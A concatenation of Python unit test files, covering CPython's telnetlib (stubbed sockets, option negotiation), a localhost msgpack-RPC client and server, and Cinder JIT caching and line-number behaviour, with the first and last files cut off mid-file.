telnet.sock.close()
def testTimeoutValue(self):
telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testTimeoutOpen(self):
telnet = telnetlib.Telnet()
telnet.open(HOST, self.port, timeout=30)
self.assertEqual(telnet.sock.gettimeout(), 30)
telnet.sock.close()
def testGetters(self):
# Test telnet getter methods
telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
t_sock = telnet.sock
self.assertEqual(telnet.get_socket(), t_sock)
self.assertEqual(telnet.fileno(), t_sock.fileno())
telnet.sock.close()
class SocketStub(object):
''' a socket proxy that re-defines sendall() '''
def __init__(self, reads=()):
self.reads = list(reads) # Intentionally make a copy.
self.writes = []
self.block = False
def sendall(self, data):
self.writes.append(data)
def recv(self, size):
out = b''
while self.reads and len(out) < size:
out += self.reads.pop(0)
if len(out) > size:
self.reads.insert(0, out[size:])
out = out[:size]
return out
class TelnetAlike(telnetlib.Telnet):
def fileno(self):
raise NotImplementedError()
def close(self): pass
def sock_avail(self):
return (not self.sock.block)
def msg(self, msg, *args):
with support.captured_stdout() as out:
telnetlib.Telnet.msg(self, msg, *args)
self._messages += out.getvalue()
return
class MockSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
@property
def resolution(self):
return 1e-3
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout=None):
block = False
for fileobj in self.keys:
if isinstance(fileobj, TelnetAlike):
block = fileobj.sock.block
break
if block:
return []
else:
return [(key, key.events) for key in self.keys.values()]
def get_map(self):
return self.keys
@contextlib.contextmanager
def test_socket(reads):
def new_conn(*ignored):
return SocketStub(reads)
try:
old_conn = socket.create_connection
socket.create_connection = new_conn
yield None
finally:
socket.create_connection = old_conn
return
def test_telnet(reads=(), cls=TelnetAlike):
''' return a telnetlib.Telnet object that uses a SocketStub with
reads queued up to be read '''
for x in reads:
assert type(x) is bytes, x
with test_socket(reads):
telnet = cls('dummy', 0)
telnet._messages = '' # debuglevel output
return telnet
class ExpectAndReadTestCase(unittest.TestCase):
def setUp(self):
self.old_selector = telnetlib._TelnetSelector
telnetlib._TelnetSelector = MockSelector
def tearDown(self):
telnetlib._TelnetSelector = self.old_selector
class ReadTests(ExpectAndReadTestCase):
def test_read_until(self):
"""
read_until(expected, timeout=None)
test the blocking version of read_util
"""
want = [b'xxxmatchyyy']
telnet = test_telnet(want)
data = telnet.read_until(b'match')
self.assertEqual(data, b'xxxmatch', msg=(telnet.cookedq, telnet.rawq, telnet.sock.reads))
reads = [b'x' * 50, b'match', b'y' * 50]
expect = b''.join(reads[:-1])
telnet = test_telnet(reads)
data = telnet.read_until(b'match')
self.assertEqual(data, expect)
def test_read_all(self):
"""
read_all()
Read all data until EOF; may block.
"""
reads = [b'x' * 500, b'y' * 500, b'z' * 500]
expect = b''.join(reads)
telnet = test_telnet(reads)
data = telnet.read_all()
self.assertEqual(data, expect)
return
def test_read_some(self):
"""
read_some()
Read at least one byte or EOF; may block.
"""
# test 'at least one byte'
telnet = test_telnet([b'x' * 500])
data = telnet.read_some()
self.assertTrue(len(data) >= 1)
# test EOF
telnet = test_telnet()
data = telnet.read_some()
self.assertEqual(b'', data)
def _read_eager(self, func_name):
"""
read_*_eager()
Read all data available already queued or on the socket,
without blocking.
"""
want = b'x' * 100
telnet = test_telnet([want])
func = getattr(telnet, func_name)
telnet.sock.block = True
self.assertEqual(b'', func())
telnet.sock.block = False
data = b''
while True:
try:
data += func()
except EOFError:
break
self.assertEqual(data, want)
def test_read_eager(self):
# read_eager and read_very_eager make the same guarantees
# (they behave differently but we only test the guarantees)
self._read_eager('read_eager')
self._read_eager('read_very_eager')
# NB -- we need to test the IAC block which is mentioned in the
# docstring but not in the module docs
def read_very_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_very_lazy())
while telnet.sock.reads:
telnet.fill_rawq()
data = telnet.read_very_lazy()
self.assertEqual(want, data)
self.assertRaises(EOFError, telnet.read_very_lazy)
def test_read_lazy(self):
want = b'x' * 100
telnet = test_telnet([want])
self.assertEqual(b'', telnet.read_lazy())
data = b''
while True:
try:
read_data = telnet.read_lazy()
data += read_data
if not read_data:
telnet.fill_rawq()
except EOFError:
break
self.assertTrue(want.startswith(data))
self.assertEqual(data, want)
class nego_collector(object):
def __init__(self, sb_getter=None):
self.seen = b''
self.sb_getter = sb_getter
self.sb_seen = b''
def do_nego(self, sock, cmd, opt):
self.seen += cmd + opt
if cmd == tl.SE and self.sb_getter:
sb_data = self.sb_getter()
self.sb_seen += sb_data
tl = telnetlib
class WriteTests(unittest.TestCase):
'''The only thing that write does is replace each tl.IAC for
tl.IAC+tl.IAC'''
def test_write(self):
data_sample = [b'data sample without IAC',
b'data sample with' + tl.IAC + b' one IAC',
b'a few' + tl.IAC + tl.IAC + b' iacs' + tl.IAC,
tl.IAC,
b'']
for data in data_sample:
telnet = test_telnet()
telnet.write(data)
written = b''.join(telnet.sock.writes)
self.assertEqual(data.replace(tl.IAC,tl.IAC+tl.IAC), written)
class OptionTests(unittest.TestCase):
# RFC 854 commands
cmds = [tl.AO, tl.AYT, tl.BRK, tl.EC, tl.EL, tl.GA, tl.IP, tl.NOP]
def _test_command(self, data):
""" helper for testing IAC + cmd """
telnet = test_telnet(data)
data_len = len(b''.join(data))
nego = nego_collector()
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
cmd = nego.seen
self.assertTrue(len(cmd) > 0) # we expect at least one command
self.assertIn(cmd[:1], self.cmds)
self.assertEqual(cmd[1:2], tl.NOOPT)
self.assertEqual(data_len, len(txt + cmd))
nego.sb_getter = None # break the nego => telnet cycle
def test_IAC_commands(self):
for cmd in self.cmds:
self._test_command([tl.IAC, cmd])
self._test_command([b'x' * 100, tl.IAC, cmd, b'y'*100])
self._test_command([b'x' * 10, tl.IAC, cmd, b'y'*10])
# all at once
self._test_command([tl.IAC + cmd for (cmd) in self.cmds])
def test_SB_commands(self):
# RFC 855, subnegotiations portion
send = [tl.IAC + tl.SB + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + tl.IAC + tl.IAC + b'aa' + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'bb' + tl.IAC + tl.IAC + tl.IAC + tl.SE,
tl.IAC + tl.SB + b'cc' + tl.IAC + tl.IAC + b'dd' + tl.IAC + tl.SE,
]
telnet = test_telnet(send)
nego = nego_collector(telnet.read_sb_data)
telnet.set_option_negotiation_callback(nego.do_nego)
txt = telnet.read_all()
self.assertEqual(txt, b'')
want_sb_data = tl.IAC + tl.IAC + b'aabb' + tl.IAC + b'cc' + tl.IAC + b'dd'
self.assertEqual(nego.sb_seen, want_sb_data)
self.assertEqual(b'', telnet.read_sb_data())
nego.sb_getter = None # break the nego => telnet cycle
def test_debuglevel_reads(self):
# test all the various places that self.msg(...) is called
given_a_expect_b = [
# Telnet.fill_rawq
(b'a', ": recv b''\n"),
# Telnet.process_rawq
(tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
(tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
(tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
(tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
(tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
]
for a, b in given_a_expect_b:
telnet = test_telnet([a])
telnet.set_debuglevel(1)
txt = telnet.read_all()
self.assertIn(b, telnet._messages)
return
def test_debuglevel_write(self):
telnet = test_telnet()
telnet.set_debuglevel(1)
telnet.write(b'xxx')
expected = "send b'xxx'\n"
self.assertIn(expected, telnet._messages)
def test_debug_accepts_str_port(self):
# Issue 10695
with test_socket([]):
telnet = TelnetAlike('dummy', '0')
telnet._messages = ''
telnet.set_debuglevel(1)
telnet.msg('test')
self.assertRegex(telnet._messages, r'0.*test')
class ExpectTests(ExpectAndReadTestCase):
def test_expect(self):
"""
expect(expected, [timeout])
Read until the expected string has been seen, or a timeout is
hit (default is no timeout); may block.
"""
want = [b'x' * 10, b'match', b'y' * 10]
telnet = test_telnet(want)
(_,_,data) = telnet.expect([b'match'])
self.assertEqual(data, b''.join(want[:-1]))
if __name__ == '__main__':
unittest.main()
|
test_msgpackrpc.py | import threading
import unittest
import helper
import msgpackrpc
from msgpackrpc import inPy3k
from msgpackrpc import error
class TestMessagePackRPC(unittest.TestCase):
class TestServer(object):
def hello(self):
return "world"
def sum(self, x, y):
return x + y
def setUp(self):
self._address = msgpackrpc.Address('localhost', helper.unused_port())
def setup_env(self):
def _start_server(server):
server.start()
server.close()
self._server = msgpackrpc.Server(TestMessagePackRPC.TestServer())
self._server.listen(self._address)
self._thread = threading.Thread(target=_start_server, args=(self._server,))
self._thread.start()
self._client = msgpackrpc.Client(self._address, unpack_encoding='utf-8')
return self._client;
def tearDown(self):
self._client.close();
self._server.stop();
self._thread.join();
def test_call(self):
client = self.setup_env();
result = client.call('hello')
self.assertEqual(result, "world", "'hello' result is incorrect")
result = client.call('sum', 1, 2)
self.assertEqual(result, 3, "'sum' result is incorrect")
def test_call_async(self):
client = self.setup_env();
feture1 = client.call_async('hello')
feture2 = client.call_async('sum', 1, 2)
feture1.join()
feture2.join()
self.assertEqual(feture1.result, "world", "'hello' result is incorrect in call_async")
self.assertEqual(feture2.result, 3, "'sum' result is incorrect in call_async")
def test_notify(self):
client = self.setup_env();
result = True
try:
client.notify('hello')
client.notify('sum', 1, 2)
except:
result = False
self.assertTrue(result)
def test_unknown_method(self):
client = self.setup_env();
self.assertRaises(error.RPCError, lambda: client.call('unknown', True))
try:
client.call('unknown', True)
self.assertTrue(False)
except error.RPCError as e:
message = e.args[0]
self.assertEqual(message, "'unknown' method not found", "Error message mismatched")
if __name__ == '__main__':
unittest.main()
|
test_cinderjit.py | # Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
import _testcapi
import asyncio
import builtins
import dis
import gc
import sys
import tempfile
import threading
import types
import unittest
import warnings
import weakref
from compiler.consts import CO_SUPPRESS_JIT, CO_NORMAL_FRAME
from compiler.static import StaticCodeGenerator
from contextlib import contextmanager
from functools import cmp_to_key
from pathlib import Path
from textwrap import dedent
try:
with warnings.catch_warnings():
warnings.simplefilter("ignore")
from .test_compiler.test_static.common import StaticTestBase
except ImportError:
from test_compiler.test_static.common import StaticTestBase
from contextlib import contextmanager
try:
import cinderjit
from cinderjit import jit_suppress
except:
cinderjit = None
def jit_suppress(func):
return func
class GetFrameLineNumberTests(unittest.TestCase):
def assert_code_and_lineno(self, frame, func, lineno):
self.assertEqual(frame.f_code, func.__code__)
self.assertEqual(frame.f_lineno, lineno)
def test_line_numbers(self):
"""Verify that line numbers are correct"""
@unittest.failUnlessJITCompiled
def g():
return sys._getframe()
self.assert_code_and_lineno(g(), g, 50)
def test_line_numbers_for_running_generators(self):
"""Verify that line numbers are correct for running generator functions"""
@unittest.failUnlessJITCompiled
def g(x, y):
yield sys._getframe()
z = x + y
yield sys._getframe()
yield z
initial_lineno = 59
gen = g(1, 2)
frame = next(gen)
self.assert_code_and_lineno(frame, g, initial_lineno)
frame = next(gen)
self.assert_code_and_lineno(frame, g, initial_lineno + 2)
self.assertEqual(next(gen), 3)
def test_line_numbers_for_suspended_generators(self):
"""Verify that line numbers are correct for suspended generator functions"""
@unittest.failUnlessJITCompiled
def g(x):
x = x + 1
yield x
z = x + 1
yield z
gen = g(0)
initial_lineno = 75
self.assert_code_and_lineno(gen.gi_frame, g, initial_lineno)
v = next(gen)
self.assertEqual(v, 1)
self.assert_code_and_lineno(gen.gi_frame, g, initial_lineno + 3)
v = next(gen)
self.assertEqual(v, 2)
self.assert_code_and_lineno(gen.gi_frame, g, initial_lineno + 5)
def test_line_numbers_during_gen_throw(self):
"""Verify that line numbers are correct for suspended generator functions when
an exception is thrown into them.
"""
@unittest.failUnlessJITCompiled
def f1(g):
yield from g
@unittest.failUnlessJITCompiled
def f2(g):
yield from g
gen1, gen2 = None, None
gen1_frame, gen2_frame = None, None
@unittest.failUnlessJITCompiled
def f3():
nonlocal gen1_frame, gen2_frame
try:
yield "hello"
except TestException:
gen1_frame = gen1.gi_frame
gen2_frame = gen2.gi_frame
raise
gen3 = f3()
gen2 = f2(gen3)
gen1 = f1(gen2)
gen1.send(None)
with self.assertRaises(TestException):
gen1.throw(TestException())
initial_lineno = 99
self.assert_code_and_lineno(gen1_frame, f1, initial_lineno)
self.assert_code_and_lineno(gen2_frame, f2, initial_lineno + 4)
# Decorator to return a new version of the function with an alternate globals
# dict.
def with_globals(gbls):
def decorator(func):
new_func = type(func)(
func.__code__, gbls, func.__name__, func.__defaults__, func.__closure__
)
new_func.__module__ = func.__module__
new_func.__kwdefaults__ = func.__kwdefaults__
return new_func
return decorator
@unittest.failUnlessJITCompiled
def get_meaning_of_life(obj):
return obj.meaning_of_life()
def nothing():
return 0
def _simpleFunc(a, b):
return a, b
class _CallableObj:
def __call__(self, a, b):
return self, a, b
class CallKWArgsTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def test_call_basic_function_pos_and_kw(self):
r = _simpleFunc(1, b=2)
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_basic_function_kw_only(self):
r = _simpleFunc(b=2, a=1)
self.assertEqual(r, (1, 2))
r = _simpleFunc(a=1, b=2)
self.assertEqual(r, (1, 2))
@staticmethod
def _f1(a, b):
return a, b
@unittest.failUnlessJITCompiled
def test_call_class_static_pos_and_kw(self):
r = CallKWArgsTests._f1(1, b=2)
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_class_static_kw_only(self):
r = CallKWArgsTests._f1(b=2, a=1)
self.assertEqual(r, (1, 2))
def _f2(self, a, b):
return self, a, b
@unittest.failUnlessJITCompiled
def test_call_method_kw_and_pos(self):
r = self._f2(1, b=2)
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_method_kw_only(self):
r = self._f2(b=2, a=1)
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_bound_method_kw_and_pos(self):
f = self._f2
r = f(1, b=2)
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_bound_method_kw_only(self):
f = self._f2
r = f(b=2, a=1)
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_obj_kw_and_pos(self):
o = _CallableObj()
r = o(1, b=2)
self.assertEqual(r, (o, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_obj_kw_only(self):
o = _CallableObj()
r = o(b=2, a=1)
self.assertEqual(r, (o, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_c_func(self):
self.assertEqual(__import__("sys", globals=None), sys)
class CallExTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def test_call_dynamic_kw_dict(self):
r = _simpleFunc(**{"b": 2, "a": 1})
self.assertEqual(r, (1, 2))
class _DummyMapping:
def keys(self):
return ("a", "b")
def __getitem__(self, k):
return {"a": 1, "b": 2}[k]
@unittest.failUnlessJITCompiled
def test_call_dynamic_kw_dict(self):
r = _simpleFunc(**CallExTests._DummyMapping())
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_dynamic_pos_tuple(self):
r = _simpleFunc(*(1, 2))
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_dynamic_pos_list(self):
r = _simpleFunc(*[1, 2])
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_dynamic_pos_and_kw(self):
r = _simpleFunc(*(1,), **{"b": 2})
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def _doCall(self, args, kwargs):
return _simpleFunc(*args, **kwargs)
def test_invalid_kw_type(self):
err = r"_simpleFunc\(\) argument after \*\* must be a mapping, not int"
with self.assertRaisesRegex(TypeError, err):
self._doCall([], 1)
@unittest.skipUnlessCinderJITEnabled("Exposes interpreter reference leak")
def test_invalid_pos_type(self):
err = r"_simpleFunc\(\) argument after \* must be an iterable, not int"
with self.assertRaisesRegex(TypeError, err):
self._doCall(1, {})
@staticmethod
def _f1(a, b):
return a, b
@unittest.failUnlessJITCompiled
def test_call_class_static_pos_and_kw(self):
r = CallExTests._f1(*(1,), **{"b": 2})
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_class_static_kw_only(self):
r = CallKWArgsTests._f1(**{"b": 2, "a": 1})
self.assertEqual(r, (1, 2))
def _f2(self, a, b):
return self, a, b
@unittest.failUnlessJITCompiled
def test_call_method_kw_and_pos(self):
r = self._f2(*(1,), **{"b": 2})
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_method_kw_only(self):
r = self._f2(**{"b": 2, "a": 1})
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_bound_method_kw_and_pos(self):
f = self._f2
r = f(*(1,), **{"b": 2})
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_bound_method_kw_only(self):
f = self._f2
r = f(**{"b": 2, "a": 1})
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_obj_kw_and_pos(self):
o = _CallableObj()
r = o(*(1,), **{"b": 2})
self.assertEqual(r, (o, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_obj_kw_only(self):
o = _CallableObj()
r = o(**{"b": 2, "a": 1})
self.assertEqual(r, (o, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_c_func_pos_only(self):
self.assertEqual(len(*([2],)), 1)
@unittest.failUnlessJITCompiled
def test_call_c_func_pos_and_kw(self):
self.assertEqual(__import__(*("sys",), **{"globals": None}), sys)
class LoadMethodCacheTests(unittest.TestCase):
def test_type_modified(self):
class Oracle:
def meaning_of_life(self):
return 42
obj = Oracle()
# Uncached
self.assertEqual(get_meaning_of_life(obj), 42)
# Cached
self.assertEqual(get_meaning_of_life(obj), 42)
# Invalidate cache
def new_meaning_of_life(x):
return 0
Oracle.meaning_of_life = new_meaning_of_life
self.assertEqual(get_meaning_of_life(obj), 0)
def test_base_type_modified(self):
class Base:
def meaning_of_life(self):
return 42
class Derived(Base):
pass
obj = Derived()
# Uncached
self.assertEqual(get_meaning_of_life(obj), 42)
# Cached
self.assertEqual(get_meaning_of_life(obj), 42)
# Mutate Base. Should propagate to Derived and invalidate the cache.
def new_meaning_of_life(x):
return 0
Base.meaning_of_life = new_meaning_of_life
self.assertEqual(get_meaning_of_life(obj), 0)
def test_second_base_type_modified(self):
class Base1:
pass
class Base2:
def meaning_of_life(self):
return 42
class Derived(Base1, Base2):
pass
obj = Derived()
# Uncached
self.assertEqual(get_meaning_of_life(obj), 42)
# Cached
self.assertEqual(get_meaning_of_life(obj), 42)
# Mutate first base. Should propagate to Derived and invalidate the cache.
def new_meaning_of_life(x):
return 0
Base1.meaning_of_life = new_meaning_of_life
self.assertEqual(get_meaning_of_life(obj), 0)
def test_type_dunder_bases_reassigned(self):
class Base1:
pass
class Derived(Base1):
pass
# No shadowing happens between obj{1,2} and Derived, thus the now
# shadowing flag should be set
obj1 = Derived()
obj2 = Derived()
obj2.meaning_of_life = nothing
# Now obj2.meaning_of_life shadows Base.meaning_of_life
class Base2:
def meaning_of_life(self):
return 42
Derived.__bases__ = (Base2,)
# Attempt to prime the cache
self.assertEqual(get_meaning_of_life(obj1), 42)
self.assertEqual(get_meaning_of_life(obj1), 42)
# If flag is not correctly cleared when Derived.__bases__ is
# assigned we will end up returning 42
self.assertEqual(get_meaning_of_life(obj2), 0)
def _make_obj(self):
class Oracle:
def meaning_of_life(self):
return 42
obj = Oracle()
# Uncached
self.assertEqual(get_meaning_of_life(obj), 42)
# Cached
self.assertEqual(get_meaning_of_life(obj), 42)
return obj
def test_instance_assignment(self):
obj = self._make_obj()
obj.meaning_of_life = nothing
self.assertEqual(get_meaning_of_life(obj), 0)
def test_instance_dict_assignment(self):
obj = self._make_obj()
obj.__dict__["meaning_of_life"] = nothing
self.assertEqual(get_meaning_of_life(obj), 0)
def test_instance_dict_replacement(self):
obj = self._make_obj()
obj.__dict__ = {"meaning_of_life": nothing}
self.assertEqual(get_meaning_of_life(obj), 0)
def test_instance_dunder_class_assignment(self):
obj = self._make_obj()
class Other:
pass
other = Other()
other.meaning_of_life = nothing
other.__class__ = obj.__class__
self.assertEqual(get_meaning_of_life(other), 0)
def test_shadowcode_setattr(self):
"""sets attribute via shadow byte code, it should update the
type bit for instance shadowing"""
obj = self._make_obj()
obj.foo = 42
obj1 = type(obj)()
obj1.other = 100
def f(obj, set):
if set:
obj.meaning_of_life = nothing
yield 42
for i in range(100):
list(f(obj, False))
list(f(obj, True))
self.assertEqual(get_meaning_of_life(obj), 0)
def test_shadowcode_setattr_split(self):
"""sets attribute via shadow byte code on a split dict,
it should update the type bit for instance shadowing"""
obj = self._make_obj()
def f(obj, set):
if set:
obj.meaning_of_life = nothing
yield 42
for i in range(100):
list(f(obj, False))
list(f(obj, True))
self.assertEqual(get_meaning_of_life(obj), 0)
@unittest.failUnlessJITCompiled
def get_foo(obj):
return obj.foo
class LoadAttrCacheTests(unittest.TestCase):
def test_dict_reassigned(self):
class Base:
def __init__(self, x):
self.foo = x
obj1 = Base(100)
obj2 = Base(200)
# uncached
self.assertEqual(get_foo(obj1), 100)
# cached
self.assertEqual(get_foo(obj1), 100)
self.assertEqual(get_foo(obj2), 200)
obj1.__dict__ = {"foo": 200}
self.assertEqual(get_foo(obj1), 200)
self.assertEqual(get_foo(obj2), 200)
def test_dict_mutated(self):
class Base:
def __init__(self, foo):
self.foo = foo
obj = Base(100)
# uncached
self.assertEqual(get_foo(obj), 100)
# cached
self.assertEqual(get_foo(obj), 100)
obj.__dict__["foo"] = 200
self.assertEqual(get_foo(obj), 200)
def test_dict_resplit(self):
# This causes one resize of the instance dictionary, which should cause
# it to go from split -> combined -> split.
class Base:
def __init__(self):
self.foo, self.a, self.b = 100, 200, 300
self.c, self.d, self.e = 400, 500, 600
obj = Base()
# uncached
self.assertEqual(get_foo(obj), 100)
# cached
self.assertEqual(get_foo(obj), 100)
obj.foo = 800
self.assertEqual(get_foo(obj), 800)
def test_dict_combined(self):
class Base:
def __init__(self, foo):
self.foo = foo
obj1 = Base(100)
# uncached
self.assertEqual(get_foo(obj1), 100)
# cached
self.assertEqual(get_foo(obj1), 100)
obj2 = Base(200)
obj2.bar = 300
# At this point the dictionary should still be split
obj3 = Base(400)
obj3.baz = 500
# Assigning 'baz' should clear the cached key object for Base and leave
# existing instance dicts in the following states:
#
# obj1.__dict__ - Split
# obj2.__dict__ - Split
# obj3.__dict__ - Combined
obj4 = Base(600)
self.assertEqual(get_foo(obj1), 100)
self.assertEqual(get_foo(obj2), 200)
self.assertEqual(get_foo(obj3), 400)
self.assertEqual(get_foo(obj4), 600)
class SetNonDataDescrAttrTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def set_foo(self, obj, val):
obj.foo = val
def setUp(self):
class Descr:
def __init__(self, name):
self.name = name
def __get__(self, obj, typ):
return obj.__dict__[self.name]
self.descr_type = Descr
self.descr = Descr("foo")
class Test:
foo = self.descr
self.obj = Test()
def test_set_when_changed_to_data_descr(self):
# uncached
self.set_foo(self.obj, 100)
self.assertEqual(self.obj.foo, 100)
# cached
self.set_foo(self.obj, 200)
self.assertEqual(self.obj.foo, 200)
# convert into a data descriptor
def setter(self, obj, val):
self.invoked = True
self.descr.__class__.__set__ = setter
# setter doesn't modify the object, so obj.foo shouldn't change
self.set_foo(self.obj, 300)
self.assertEqual(self.obj.foo, 200)
self.assertTrue(self.descr.invoked)
class GetSetNonDataDescrAttrTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def get_foo(self, obj):
return obj.foo
def setUp(self):
class NonDataDescr:
def __init__(self, val):
self.val = val
self.invoked_count = 0
self.set_dict = True
def __get__(self, obj, typ):
self.invoked_count += 1
if self.set_dict:
obj.__dict__["foo"] = self.val
return self.val
self.descr_type = NonDataDescr
self.descr = NonDataDescr("testing 123")
class Test:
foo = self.descr
self.obj = Test()
def test_get(self):
# uncached
self.assertEqual(self.get_foo(self.obj), "testing 123")
self.assertEqual(self.descr.invoked_count, 1)
# cached; __get__ should not be invoked as there is now a shadowing
# entry in obj's __dict__
self.assertEqual(self.get_foo(self.obj), "testing 123")
self.assertEqual(self.descr.invoked_count, 1)
# cached; __get__ should be invoked as there is not a shadowing
# entry in obj2's __dict__
obj2 = self.obj.__class__()
self.assertEqual(self.get_foo(obj2), "testing 123")
self.assertEqual(self.descr.invoked_count, 2)
def test_get_when_changed_to_data_descr(self):
# uncached
self.assertEqual(self.get_foo(self.obj), "testing 123")
self.assertEqual(self.descr.invoked_count, 1)
# cached; __get__ should not be invoked as there is now a shadowing
# entry in obj's __dict__
self.assertEqual(self.get_foo(self.obj), "testing 123")
self.assertEqual(self.descr.invoked_count, 1)
# Convert descriptor into a data descr by modifying its type
def setter(self, obj, val):
pass
self.descr.__class__.__set__ = setter
# cached; __get__ should be invoked as self.descr is now a data descr
self.assertEqual(self.get_foo(self.obj), "testing 123")
self.assertEqual(self.descr.invoked_count, 2)
def test_get_when_changed_to_classvar(self):
# Don't set anything in the instance dict when the descriptor is
# invoked. This ensures we don't early exit and bottom out into the
# descriptor case.
self.descr.set_dict = False
# uncached
self.assertEqual(self.get_foo(self.obj), "testing 123")
self.assertEqual(self.descr.invoked_count, 1)
# cached
self.assertEqual(self.get_foo(self.obj), "testing 123")
self.assertEqual(self.descr.invoked_count, 2)
# Convert descriptor into a plain old value by changing the
# descriptor's type
class ClassVar:
pass
self.descr.__class__ = ClassVar
# Cached; type check on descriptor's type should fail
self.assertIs(self.get_foo(self.obj), self.descr)
self.assertEqual(self.descr.invoked_count, 2)
@unittest.failUnlessJITCompiled
def set_foo(x, val):
x.foo = val
class DataDescr:
def __init__(self, val):
self.val = val
self.invoked = False
def __get__(self, obj, typ):
return self.val
def __set__(self, obj, val):
self.invoked = True
class StoreAttrCacheTests(unittest.TestCase):
def test_data_descr_attached(self):
class Base:
def __init__(self, x):
self.foo = x
obj = Base(100)
# Uncached
set_foo(obj, 200)
# Cached
set_foo(obj, 200)
self.assertEqual(obj.foo, 200)
# Attaching a data descriptor to the type should invalidate the cache
# and prevent future caching
descr = DataDescr(300)
Base.foo = descr
set_foo(obj, 200)
self.assertEqual(obj.foo, 300)
self.assertTrue(descr.invoked)
descr.invoked = False
set_foo(obj, 400)
self.assertEqual(obj.foo, 300)
self.assertTrue(descr.invoked)
def test_swap_split_dict_with_combined(self):
class Base:
def __init__(self, x):
self.foo = x
obj = Base(100)
# Uncached
set_foo(obj, 200)
# Cached
set_foo(obj, 200)
self.assertEqual(obj.foo, 200)
# At this point obj should have a split dictionary for attribute
# storage. We're going to swap it out with a combined dictionary
# and verify that attribute stores still work as expected.
d = {"foo": 300}
obj.__dict__ = d
set_foo(obj, 400)
self.assertEqual(obj.foo, 400)
self.assertEqual(d["foo"], 400)
def test_swap_combined_dict_with_split(self):
class Base:
def __init__(self, x):
self.foo = x
# Swap out obj's dict with a combined dictionary. Priming the IC
# for set_foo will result in it expecting a combined dictionary
# for instances of type Base.
obj = Base(100)
obj.__dict__ = {"foo": 100}
# Uncached
set_foo(obj, 200)
# Cached
set_foo(obj, 200)
self.assertEqual(obj.foo, 200)
# obj2 should have a split dictionary used for attribute storage
# which will result in a cache miss in the IC
obj2 = Base(300)
set_foo(obj2, 400)
self.assertEqual(obj2.foo, 400)
def test_split_dict_no_slot(self):
class Base:
pass
# obj is a split dict
obj = Base()
obj.quox = 42
# obj1 is no longer split, but the assignment
# didn't go through _PyObjectDict_SetItem, so the type
# still has a valid CACHED_KEYS
obj1 = Base()
obj1.__dict__["other"] = 100
# now we try setting foo on obj1, do the set on obj1
# while setting up the cache, but attempt to create a cache
# with an invalid val_offset because there's no foo
# entry in the cached keys.
set_foo(obj1, 300)
self.assertEqual(obj1.foo, 300)
set_foo(obj, 400)
self.assertEqual(obj1.foo, 300)
class LoadGlobalCacheTests(unittest.TestCase):
def setUp(self):
global license, a_global
try:
del license
except NameError:
pass
try:
del a_global
except NameError:
pass
@staticmethod
def set_global(value):
global a_global
a_global = value
@staticmethod
@unittest.failUnlessJITCompiled
def get_global():
return a_global
@staticmethod
def del_global():
global a_global
del a_global
@staticmethod
def set_license(value):
global license
license = value
@staticmethod
def del_license():
global license
del license
@unittest.failUnlessJITCompiled
def test_simple(self):
global a_global
self.set_global(123)
self.assertEqual(a_global, 123)
self.set_global(456)
self.assertEqual(a_global, 456)
@unittest.failUnlessJITCompiled
def test_shadow_builtin(self):
self.assertIs(license, builtins.license)
self.set_license(0xDEADBEEF)
self.assertIs(license, 0xDEADBEEF)
self.del_license()
self.assertIs(license, builtins.license)
@unittest.failUnlessJITCompiled
def test_shadow_fake_builtin(self):
self.assertRaises(NameError, self.get_global)
builtins.a_global = "poke"
self.assertEqual(a_global, "poke")
self.set_global("override poke")
self.assertEqual(a_global, "override poke")
self.del_global()
self.assertEqual(a_global, "poke")
# We don't support DELETE_ATTR yet.
delattr(builtins, "a_global")
self.assertRaises(NameError, self.get_global)
class prefix_str(str):
def __new__(ty, prefix, value):
s = super().__new__(ty, value)
s.prefix = prefix
return s
def __hash__(self):
return hash(self.prefix + self)
def __eq__(self, other):
return (self.prefix + self) == other
@unittest.failUnlessJITCompiled
def test_weird_key_in_globals(self):
global a_global
self.assertRaises(NameError, self.get_global)
globals()[self.prefix_str("a_glo", "bal")] = "a value"
self.assertEqual(a_global, "a value")
